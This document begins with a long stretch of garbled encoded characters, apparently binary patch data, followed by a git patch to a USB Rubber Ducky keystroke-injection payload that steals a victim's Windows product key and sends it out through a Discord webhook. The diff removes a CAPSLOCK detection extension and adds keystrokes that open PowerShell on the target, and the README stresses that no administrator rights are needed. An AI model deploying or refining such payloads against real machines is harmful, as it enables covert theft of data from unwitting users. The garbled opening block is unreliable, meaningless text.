zEl~Cc`-oq560h;6uBY^G;6k$IrBA6t{zx7+S{*ds9JGefr5E(10-pDDpuTyE4YyZc ztdAb1@Cg@mlkCVrgm`#V29{Ca$wM6Oy&Q_&iE{f9EAiLW|LmlibbMs*(waZ*Q??H+t07Q2%rMnu17 zu~{j@9k_aArmPT*i6G#?5&{nqB5*X?E;asRKq-&}Wg1)0XO~R!%Uanxet_Mm`Q=8q z>-`vhk^GFIP)^y6>63ZDt-BqOBDH0cVh9ANjtMMBeehZ9gJh)Rs>!3gDM~Y-J#+yJ zp{GC$(?)Z@Nku!u%++bQ3_?EUHGz&A6>WH$_@rS6F_ZSd_>t&w{U1WuVS+bCqyb{3 zE;`|HYgw$gSWzvc;Pw@Y*sCscF>XSwT3k!Eq}>X?8xI2+F?76Sa_=_yXM%W9apepk zOeD!tjV}e~yYQH>JeHm33(;J3#aEsyz*D8P!ooNX#+g&6f6Oj1s&(H!{_}oKx zXdbG-rb+=DV2)AEAVojJTBa%LJ*|tE|$v5||1_zeA3(FaXbpm4y55I+rglTfR1d z$orWW_V9t4-^Tq>@cCwd-4k|RF=@I027s4DQ)4HTVlHo7SOf{TLKX{DiOI?B^Q6a= zHdQtX~Ex1Q(dQ+tWy#d(1FhN5J=Bmh#4cuf-HCgq?!Mp|3`B!0? zIKwY-b)y;e1G2cgy?n0a%^EN4==b> zK?2*!S{3`ffJppap8$(-?aM0TYP4hBrwgNE{}Lj%?VKiJfor|^F1ulVXmECVGV9d# zTI+_e8OR~#EMKGyU_pe=&hJH2Me2%5=POR7yo-DZ8%JGgvb5~m;v<2ZPF+PH2Pv@|6ytgqNo)+PBRoAZdi7&Vg9o)2L`x&u_bx2l`r#Q zR69d^%u|f;>t2F%#MyVe%?+5;KJQ8>E-?EG!KIe%Xg;}Lfn}SrOop@n+&v&UIL!l6 zETSCXjQCvEnx?IOzLiD{Rn=l51S%?GBIk6F3qk9$rg+<-ub7i9X^A!+#XyeFi4$@O zfmIv>F=E&Qk{*eqFBcevNDVVIdL^<=LN`P{2Q<|{6WZBT3QNv0?qMZZO!hZOgO!L$ z#H_;$6=j;Q)W_l3Ot!y2IU39$KUt5;8Rs+H7!%J|0LMoD7^_?#9k~vQKCV}x@6cMw z1R#}4=U+H#i75%PkRpU%k4ld&q-NMxg5Xm9w~ud)RG}rP(F6J>mLk-x(cv-{3*Z_H`StF%p-98zz;BR>yx=QF7uEy^6xE%0Mda9} zj#B}W417*>2juaIZHx?o{1nH*rwx$K1=dcff2Y!=kHssJd>15M3b@l;x>+3i@eJKF_nb4lyMsxnuYu^4#Qi#Z z7xY$?Xp6H8X=iBH#ddWWGJl|Mzr!}#&x&+%)6{ELmKa5L@N&Rfq;a=%g^mih40B}7 z;C2DkEBax|hh7v~fM;@Dj%`2hvYlG{!ZXm#;$yz70M99-BH16<8aateIAJ3;`-Ljp zcGokXeJOt4AKqAiP!}Q~R+0a4X^81)T->g31{q&1i!%aAm!1mM^$HP4eBxOM$0h+_ zXh^RhgwLA~ftKCKi%%nEQs?tmJBs_MKDj71_uqtek3QTZ;i0BU>RIPpX+_hChu&d3 zNkKc8TqPJ?xOO?=LqWc(eYU#fZVRJw_*8hIs_y`6qD47iVjXgg(H_`9w0cdU)*nj@ zY(VYI5LZdESv0d!TI)V0YDnH?#?dLq*ao*1@}$h}!B-;8AQjHsgL*RS5OspU-CC~W zoac;7_yO1*Z4D8ee(veZ!r#`I>m{-C0xd~t&QuiIna(fCkd+E*>S7BDUM~xmV&&&f zM7Cf4#9%P}`vGoT&uNE99~S)FCwH6QQDlzi#cYff#?lq$-TFfD^55uXW6w7ImycQ= zan#aN&G0p~bfVDgu@dC%+_Q_HhMX13r& z`@JyjX{2V)@xgAexJEhc#Oh-IyYFHg?wdAqzCR4c)aJ2S{6qs4rBY_41TOgsMH88a z!-OFsPFadpJF6G+E8}ob^CW)7GVJ|^a^7yr_LA$@-L-?;n)fr#W-7DovaL(lc;>3m z$0f}^!Df*!&x#b_c=&frL%q;sd{S?OT$8;|%nDo^UmXWXuifs-Zb_L#%X-X_=JIRE z4whYStsPIZBvFtb7nKoo@7?JLA8ZCw5`)Z{i2$d5R$+hE_AqAFqfSe1*U)lyE|R=v*s=BP{lsm*`=*Zl z-{!HF@0EW}DsEDdeDXSmSv~Pjnp(QUDgk})%`bN0mb%>nyg2hcDBO7u5u)%D&{)LH z*7W&_i@Qt4iPI&?xBCt|!qZ9T`*R$GI_tUT%A#`P88*I^K6&_Sda~8FOyixlw3;&M z+0c5L+C9Oz{crPWk2ag5P6nAE*C*WsC2i;0gKcUYL@O@IkV$(D*od8=ZJZl-oIiMOZ*v+KRP!iQ@V9~MPNL1 zaI#Gmc?Ra*I$hytAWD4>_)|z z_SN`5#5b>f#v?wm_86$1o-<6K5*4^wHb&|$JUCElK5J7C1jr)QN^&KiBxN4Wg!&T| z=??k~D0X~9%;&r+AHm|5UTWcY!&)`7#QymfXKa?Y^Sm5PT`xf?YmUNAE~oQ)^^-%v zX8X`w{7K;g7%7;wVV&Su7&KApOyvia?UQL zZY7l(8zmqLO)HESHM8jWv?SzDHsHZLA9?OC<^@fhZL1o%G&x*mDjuxezRBLNSj_SV zET5iGg#`V8cQw4EcwcFmRLpsBP7iH!&EejXfb8*&MJ&Ch&Q5wQqg%^VpHJ&SzqQ`< zx_1|+Ss7wII~<=wEm_=FtKU=2HMa#5DKs;|K^88mw{!6wNFQIvE~@cvY+Hkl9h+}c zZzahIsu{GzdVjs(Ql62se)niJr@x{wjI8zI1^!G>t@iQrCKv5`F~AIIPMJ)-vVGv* zVo1@lVSJH@PRwW3W9v>`ceH2@i)c!6buc zwp;am*oMrTTLKo#he@Z-fDv8=MiI<&);;M+(4$sfiwK_1c+JT%=1sN~bxmOo`uWi+ zE3CpyXXh1opAb`s1ms>z5puGFyZhlL)T9mR3hDiAgT%Hmv9L-$UWS)qH6C=kmr8e$pI7a>G9)4*Nmr^Fwsj(bfRnw0GS7A*Lx>mZMPZVTX$CG-Aw6Tl zxSPPe5!%`38MK@hnlKz6t*83jSuvIsHbmAA2;$+}nR2tj4;m$;d?bv=xA}M+Z|)d- zTY%yuN6lkgexRnsB_5=IV`sab#TvK*Tj0CYr$Fp{1d+D-wGVtPsg8|(4jcCBd={fA z5uuZOY#&HcVNM?DTq?UXTCj8rnKzy?LT>?29c(Nv1zaRp#SY$1x0+99^$vK$4PrFl za*qS6a||8&Z1;8#euwoPUy%HP!yWkVbz6MsBFc-XPLNfWFr#3Clpb@&A?D<#{BDU7 zuz%>A|BJOg?*6u<2HHljo)e}%Wh|gkZ<^_MmB8r-9Aki}uIs0}Y8TZ4a`#Ls1AJ56 zi1Kt3jF?c!_Zn}V1QX15wV3O?pB#xhVdhcsahTNv2rjA5cQ7T>o|ts(kpTZf{>#<~ zIVJw`r8dH}*0=U4Qg|3$V~22q%_1tDMDggWQmIQm)>EN-yq zM573sN7QUGFWbDImp#UIXazWr5qHkxdfNU;vwTOdX}&Q2>g^Uj!Ub`}iaGtH_TLZQ z4c8>vj=w~!xx);74wq60pD5Pjo3P_DRM*_!Xa_UzjI>Ez*_^H^(sh1^%Yjt*IF1*! z7{)3%tXzvAreb4G>!Wle{8!1soK31bCpDBGBs&5@d6ROpby@C#OqsMI1eS}duxs!B zqgRYWP;9%5FpG_*s)E7`Qv2{$#;SiS!+5Z#@ zH<5Fo#FVqE>U?m$M>cO+rosEmlViODNRZV-iSjXhH-LXTG!z6_v05@Sp>IW)*-E35nb_6QXvf!DSY;cbkDgB;pg_*fU9<- z2F}I+b3aYq?2VjpfmHiIw13GR}SpuuewN1a^i>hPOu`l?0a3 zuX{Gm>&~I{VfY~boLCnqkEbb#dFdrJln5P?-M#IZ;RZb^@jpBL4&y`>lL(J(EZn&= zB34P<)kS2S9H7X*))l(TU?kV#F1W%BiM1Lrvec>h!jAEGR4naNPOEP|w zD078`<*};s-pwr^e-h$8X131!i=4T5Ufe%N)i{XMVs2(+J)IAjVjKZF1X0jkX5?6e zs{))ZzgyFN*N~RN0(EyOX@kJp+WNav^t}NT*+ZSB)o3E-cMd$JTJaCaYN8~cn6u1{SSaMxys|L>O^b-f^Pwk{ z@g?fcavR@kDF+@{0=_Q*`2h#r$=y>+NkiLLdybG8X8J4=?|;~bFbk6|62;z2M5N$&A5Qb76&I=kL7EW zrX)vt*FxHGr?K8NJbkY?@#SzH{rcZQ-`EveA(L9pF+3G|%abrS*O#=qeKZu7Zl}Wg zAm;mZu6f!4SF>36;&Gdf9`k~^ySWVYCoMKO*M~sTJE|yg)pc6af<(2_#Krn;Z9d8- zP`bL}XH<_spAunm&gVa-)5&36g@TWv8~7+}e?*yZEfQN9HK&~n8;Xwnsn)VoQ2)Y% z@s>F1vMe?_O2YNw!;$_yQBrttUoGNsBxNPh)V&f#*TzO9PkHo;kT_Tn9_=j8j%l25 zevVIXY|6YzHa`JsRpRA7>h7dqz!m3|d$Iyu=P*5UXScLwNDRaepd$Bbq49ihTpXhD zZnaf}_hwmr8ox5(_O--+XgMCSNfJXx&u>#7X9GyiU$iO*bmCZ@!+jXsu;3OABaf?a z3y8K>q+W9FX0b&T)VYYEK~h9X2F1BuIBoGgnsNFN ze5R9oQ##IOphu)%Il%qvSEXq9y%+V z9P^4SKj3^|>@EQBN4BbJD^;V=`-#-(r^~%@5Co=ir(bB+WT7zQnPBd};*ec(KWx}jd)s*h*XU-rD)bME()qJ>QbV9vY^gOlYv)IB zt#xsr1UO}*$J4lG28M#N!QlY*>p?t`PrvTJH+^$vK@uGvG>`AAJ##{jBKE!@G~qoN zk!dw?d5vX8ZA(>FbvczEh^g{3%P)fw9t!taqg1_L|EQK5)!j)>z-RZW9R>_xTXZ83 zkl!({yvs-(Zq6Wgp-&0cM1+BR_Y_UgqdIW>ScatY0Lbh0W4fMi_4D6_Yd|vT&Gl}g zVSH)FJ?=`xhmIMGyG3e<(u=Vk7yd&&W-I@beDqY2TkMRW454SgY#A=QO?>_|(d(8^ z)i)HHonu3ZnddQ0w`}Ad!#dc__1t=mECj7PTIO-Q#iHtla>(vsxua6C=5fBou?_Li z;0^Xs#HidOK2p2>B-zEH&C1FAwDoamwZ_RywdobL(M1ZjX2g*o3Y&=9KLRyuDAzo8 z3l_%OW09cU1U)U6jbwR$KWARNe`6PyBjT4E(2>`tcEP@S)*C65X!0b2|)X`RS5d^ky?L$aSVw(w66M2v7Dt*3|IZ<&BtZU9DF?A{m4y% znT_-2$*wmfiqo!BlB4D}g!WnYu~-Z7VhiOl{-`abvnf+g`6_SQwo?8BjVaLxK{bU+ zC=p(qfY8V*wCWeuDEK74SugaAU3c)R!SMpE9K|bEQ0p4wb7(gvvA3tF^Ci-1OMch@ zQiXqFbl2p`t`pFi@@!HxU>-hJA$mqm^Jqr~Cf62_AKT#FGzS@zp4IRRsI(NM`Z1V5 zU)r-nn{^mKzV|iY6|_mAp$IrPQvNM=wJy2Ra#4m#9A4xqK2$tWMXnKHbte1EK75-~ z(71B>67BtxrkRQ|bqz?M_NMuR>q4Jg!prt8%b&8on-5z`t3Psh z!nsaP7IF|}m~htK2;XsYxg1=ZTBe?T!(y?>-#w`GSH%2frWxgNGK=8xb^Bw$iWf5h`$QH`6Hi70N~BrOw#NIMJuM1=6AU_BE^8sNu-ZBWEY^#Mq#P;oQq3p ze>l4c+I3?GRqaI@V+1O+B9`pyE~tE@V3Luy&-FtnDh$1re4~L#iR=Xz++kli6Vte4 zN_0$^rs;~LYXcJA5(3KAP_nwz7W-D$dvbc7;IH&DU9JDCpF0h~rG?%8O{PTVTt>dl z+MRQvHE5z>i}M=3@r%$ly5Z;4lUds!)#P2!m3wkz;1iE6@6Lcza&UM0Tsr zGh_}?V{XJB;yN1XRR!EEiDV4nv<7;GTJC1q%Gwb{U*?+M(FIfA*n2_ew+|9%Cfyv~ z4aYkJ>Bx7WBPDGmt&-*|!Z97&G2^uqJ*4!!>jpX631ob=CXIR`MX~kB9&9Zon;G-@ zV1RW6%wrF*2>{Y^);iu9R|MHMm>JG|Q9AA8%XB*}x&G=haMfvgfd9gFtf3_%zpR#F zniu&8p3Ikv+h%iXsU!t!1lMV>!<4SdxGj8yp6ABUoat;n*@OKahpz(5^$&$IAX`oMahq8Gizfd&H;jlAogbT#S~o5Es)}1 zxi~l>1#YqsUjZaVDz5&wHUI07+|k#C=khKGFAo#zs~K zq_W^12^3Jm1sso3K+kl+XKfNG^Qrjbn^vHrEb!U#2Bn@kGd=W0-^!13e_q?$TcrwX z-?)tRU68yXjNCfH)Bg$b2#@3`mbRqq{0@o*y+*{J6&WP`#qpSnz{89?Y2Q)0(X=ek zCB1-{iFrNy+j4M}dsgsi9fgQ<#Jt>B|MN03p&`S2Y{Vq8SIkEWasQo2U5*Hbb);m$ z^#z(uQW4>1oys8Y@hW>B@)XSsf#QNveG)=h?k&)zOA%v5Y{|kU?KCF~J5gHIPz$}9 zXtTrSA!fYY1%s$3Rd6YXp+x@oBHh0}kvQW($R|^_AliXP)!vIiq`knwAX39DIwcba zDLhnI2!8LN75;xz<3eOSXTnh^bY4G`(=Z;3_SIo_pa|FNbds4ep4+bqQSC%pU)qMB zh!YiD!~D5!^f5((%+`LC`5C{}RZI{O#mqGpW4V;InH*J$u{TDduDBV*jvTng<+vFS z-)wu*Eg84_E@nV>fDQU<#b9EvD(&H5p!zf;RE|Q^GccsA3?z}L#fG^uJ#dS&1G{(7 z=O*>7b}a3Y>awMK%a@Wjw$6;uJP6XHh0zgle*rR4*PE~hVZ zL`fd4tgP4oCjo-!w*)KT0_%Z98!&V^p4;hSG9&a)Z-YU&?zYfuBA=S-NP|F3eHQ%$ z=rd#DJ+c7bn3XTl2s+r9X7ZUx-hfdu7!13c$7CNoDEu3V`GYeYszejXU@AaUk`2HU z9XVW@t@>W}AAD@#9HFUf%2q{Ryk?&)jo8QPZ1W(F_BNJE8(lb>Hb!&9YcBH;s+x#} zUmA_*N^uqx6f}8VWlmukxLU?9wJq+t3JOlHg5gQb=ht_43h|!jEP8htk&jjOaSbm8 z&YVMmyUU`lIWkc>D!ZyCvJ47o;fne^Ew}hK82F!jh*swtI?sAdpL`F62rVvFh$Z*? z>-B2sfN!c$&`A(sl;jv6O=b$!#iuEM-#avX`O1izY0O)s$80%2yTu{${~gcxedd Date: Tue, 12 Dec 2023 08:37:45 +0100 Subject: [PATCH 3/3] Removing the CapsLock Error --- .../Exfiltrate_Windows_Product_Key/README.md | 30 +++++++++++++++---- .../payload.txt | 28 +---------------- 2 files changed, 26 insertions(+), 32 deletions(-) diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md index dc6a7e2..9a5d173 100644 --- a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md +++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md @@ -17,6 +17,7 @@ No administrator permissions are required to do this, isn't that absurd, right? - [Payload Description](#payload-description) - [Product Key Types](#product-key-types) - [Sources](#sources) +- [Credits](#credits) ## Note @@ -39,9 +40,7 @@ DEFINE #DISCORD-WEBHOOK example.com Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself. -At the beginning of the payload, the DETECT_READY extension [[1](#sources)] is used to optimize the opening of a PowerShell session on the target. - -The following commands are then executed to obtain the necessary information about the Product Key: +At the beginning of the payload, the commands are executed to obtain the necessary information about the Product Key: 1. This command retrieves the currently in-use Product Key: @@ -87,5 +86,26 @@ Understanding these key types is crucial when working with Windows Product Keys, ## Sources -- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready -- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3 \ No newline at end of file +- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3 + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt index a2a7c7b..770e9c9 100644 --- a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt +++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt @@ -12,34 +12,8 @@ REM ################################################### REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg... DEFINE #DISCORD-WEBHOOK example.com -EXTENSION DETECT_READY - REM VERSION 1.1 - REM AUTHOR: Korben - - REM_BLOCK DOCUMENTATION - USAGE: - Extension runs inline (here) - Place at beginning of payload (besides ATTACKMODE) to act as dynamic - boot delay - - TARGETS: - Any system that reflects CAPSLOCK will detect minimum required delay - Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms - END_REM - - REM CONFIGURATION: - DEFINE #RESPONSE_DELAY 25 - DEFINE #ITERATION_LIMIT 120 - - VAR $C = 0 - WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) - CAPSLOCK - DELAY #RESPONSE_DELAY - $C = ($C + 1) - END_WHILE - CAPSLOCK -END_EXTENSION +DELAY 2000 GUI r DELAY 1000 STRING powershell